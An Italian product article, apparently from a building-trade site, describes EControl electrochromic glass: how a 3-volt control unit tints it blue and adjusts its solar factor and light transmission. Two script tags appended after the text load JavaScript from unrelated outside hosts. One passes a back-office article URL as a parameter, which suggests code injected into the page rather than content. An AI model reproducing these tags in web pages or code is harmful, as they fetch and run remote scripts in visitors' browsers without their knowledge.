Tramite un apposito comando elettrico a bassissima tensione la trasmissione di luce e calore del vetro EControl ® può essere variata e regolata. Assumendo una leggera e piacevole colorazione blu il vetro si adatta alle condizioni variabili del giorno e delle stagioni.
Il principio su cui si basa la struttura di EControl è lo stesso del tradizionale vetro a controllo solare. Con l’ EControl la lastra esterna di una vetrata isolante è sostituita da una lastra di vetro elettrocromico stratificato, cui possono essere aggiunte altre funzioni quali la sicurezza agli urti, al vandalismo, e all’effrazione.
La funzione di regolazione del controllo solare della vetrazione è ottenuta collegando il vetro ad una apposita unità elettronica di controllo. In questo modo le caratteristiche del vetro da statiche diventano dinamiche grazie all’applicazione di una tensione elettrica di 3 Volt. Il colore che assume il vetro porta al quasi completo filtraggio della radiazione infrarossa vicina. Con l’aiuto del controllo elettronico il fattore solare viene regolato tra il 12 e il 40% mentre la trasmissione luminosa viene regolata tra il 15 e il 55%.
L’ingresso di luce e calore in un edificio attraverso finestre e facciate vetrate è quindi regolabile e il calore estivo può venir pertanto notevolmente ridotto. Il vetro rimane comunque sempre trasparente. Grazie alla riduzione dell‘abbagliamento è inoltre possibile evitare l’utilizzo di ulteriori protezioni solari convenzionali.
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>